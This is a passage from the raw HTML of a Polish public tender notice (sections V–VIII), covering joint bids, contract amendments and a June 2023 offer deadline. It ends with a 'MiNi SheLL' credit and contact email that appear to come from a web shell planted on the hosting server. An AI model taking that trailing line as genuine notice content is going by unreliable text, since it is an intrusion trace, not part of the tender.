poświadczenie wraz z OFERTĄ! <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wszystkie wymagane <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy w zakresie dopuszczonym przez Ustawę z dnia 11 września 2019 r. - Prawo<br/>zamówień publicznych, ponadto dopuszczalny rodzaj, zakres i warunki wprowadzenia zmian umowy określone zostały<br/>dodatkowo w załączniku nr 7 do SWZ - Projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-23 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com